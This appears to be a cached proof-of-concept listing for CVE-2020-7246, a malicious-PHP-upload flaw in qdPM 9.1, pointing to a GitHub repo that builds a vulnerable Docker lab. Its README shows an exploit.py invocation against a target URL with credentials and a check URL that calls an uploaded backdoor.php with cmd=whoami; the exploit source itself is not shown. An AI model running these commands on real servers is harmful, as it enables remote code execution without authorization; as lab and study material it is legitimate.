CVE-2020-7246 PoC — qdPM 代码问题漏洞

Source

https://github.com/arafatansari/SecAssignment

Associated Vulnerability

Title:qdPM 代码问题漏洞 (CVE-2020-7246)
Description:qdPM是一款基于Web的开源项目管理工具。 qdPM 9.1及之前版本中存在代码问题漏洞。攻击者可利用该漏洞上传恶意PHP代码文件。

Description

A Docker image vulnerable to CVE-2020-7246.

Readme

# CVE-2020-7246 (qdPM 9.1)

For educational purposes only.

See Reference for the details.


## Run
```
$ git clone https://github.com/arafatansari/SecAssignment.git
$ cd SecAssignment
$ docker build -t cve-assignment:ine .
$ docker run -it -p 80:80 cve-assignment:ine
$ service apache2 start | service mysql start
```

## Exploit
```
$ python Exploit/exploit.py -url http://{target-ip}/qdpm/ -u test@localhost.com -p password
```

## Check (exploited)
```
$ http://{target-ip}/qdpm/uploads/users/xxxx-backdoor.php?cmd=whoami
```

File Snapshot


 [4.0K]  /data/pocs/8f20ae43fd91c4680ccceea81f62b180432c34ed
├── [ 125]  Dockerfile
├── [4.0K]  Exploit
│   └── [4.4K]  exploit.py
├── [ 65K]  RCE_CVE-2020-7246.jpg
└── [ 530]  README.md

1 directory, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!